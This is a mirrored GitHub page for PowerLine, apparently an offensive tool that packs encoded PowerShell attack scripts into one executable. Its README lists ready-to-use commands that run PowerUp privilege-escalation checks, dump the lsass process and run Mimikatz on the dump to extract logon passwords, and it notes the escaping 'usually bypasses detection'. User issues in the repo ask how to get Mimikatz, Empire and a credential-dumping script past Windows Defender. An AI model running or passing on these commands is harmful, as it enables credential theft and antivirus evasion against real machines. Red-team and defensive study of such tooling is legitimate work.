GithubHelp home page GithubHelp logo

powerline's Introduction

PowerLine

Download the Repo

Run the build.bat file

Update the UserConf.xml document to contain the URLs of the scripts that you'd like to include (examples shown)

Run the PLBuilder.exe file

The PowerLine.exe program should now be created and contains embedded, xor-encoded, base64-encoded versions of all of the scripts that you specified

Example Usage:

//Shows scripts that are currently embedded in the program

PowerLine.exe -ShowScripts

//Run Invoke-AllChecks from the PowerUp script

PowerLine.exe PowerUp "Invoke-AllChecks"

//Get a dump of the lsass process. Must run as an admin

PowerLine.exe Out-Minidump "Get-Process lsass | Out-Minidump"

//Run mimikatz against the dump file created by the Out-Minidump command to extract creds. lsass_dump_name.dmp will be the name generated by Out-Minidump

//Yes, it's hellacious escaping but it works and usually bypasses detection =)

PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command \"`\"sekurlsa::minidump lsass_dump_name.dmp`\" `\"sekurlsa::logonPasswords`\"\""

powerline's People

Contributors

akshay737 avatar fullmetalcache avatar leoloobeek avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

kurtdegreeff crypt3x737 dash1b ankushgoel27 aut0m8r analyticsearch iraqnophobia slooppe shocco killvxk sasqwatch pipichong ubadrequest z3v2cicidi dskho blackstar24 cabve mhaggis fxdkyou yangfan6888 insideus binlmmhc fuckup1337 attackgithub wisdark r4w4t halbachb karutisl pix smarrazzo kaisaryousuf alphaballer yaoxiaodai likescam topotam vs-red manantsoar dannymas an4kein leomatias jack51706 trevor3000 red-infosec pcaro90 happysharegithub askyeye samuelriesz christopherchewa dagda76 sp00ks-git ithelpdesk-cdot tmp63498 yll-f1 curtishoughton jasond2014 todonnal2-r7 main20 allblue147 0xtoast istoliving bl4cklabel88 apkc ahrendsschmidt a7t0fwa7

powerline's Issues

Networ errors related to SSL /TLS

Hello,

I'm trying to run PLBuilder.exe but I'm getting SSL errors

" system.net.webexception the request was aborted could not create ssl/tls "

I get this error in Windows 10 64 bits....

Any idea on how this can be solved ?

PowerLine and defender in Win 10

Hi,

I tested several scripts, the results are as follows:

1 ) mimikatz - access denied. If I turn off WD - its not worked but with diffrent errors, so - its another story, but defender some catches it anyway.

2 ) empire http listener and https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1

here very strange situation: its not blocked directly (no notifications from WD and so on) but its not worked. Those - if I turn off WD - its fine, all goes well.
But then its running - no way: empire and WCMDump just "dies" without any messages:

C:\DISTR\POWERLINE\PowerLine-master\PowerLine-master\PowerLine>PowerLine.exe Invoke-WCMDump "Invoke-WCMDump"

Command Invoked: Invoke-WCMDump

C:\DISTR\POWERLINE\PowerLine-master\PowerLine-master\PowerLine>

So, something has changed in WD and its rules - maybe you have some clues how solve it?
Especially interested in the option with Empire

PowerLineTemplate Crashes

When running the following command on Windows 10 x64, PowerLineTemplate crashes and "stops working":

PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command \""sekurlsa::minidump lsass_dump_name.dmp\" "sekurlsa::logonPasswords\"\""

PowerLine not working anymore in Win 10

Tried to run PowerLIne in a Win 10 machine and AV caught it:
PS C:\WINDOWS\system32> cd C:\PowerLine-master\PowerLine-master\PowerLine
PS C:\PowerLine-master\PowerLine-master\PowerLine> PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command "\"sekurlsa::logonPasswords"""
At line:1 char:1

  • PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command "`"sekurlsa ...

This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.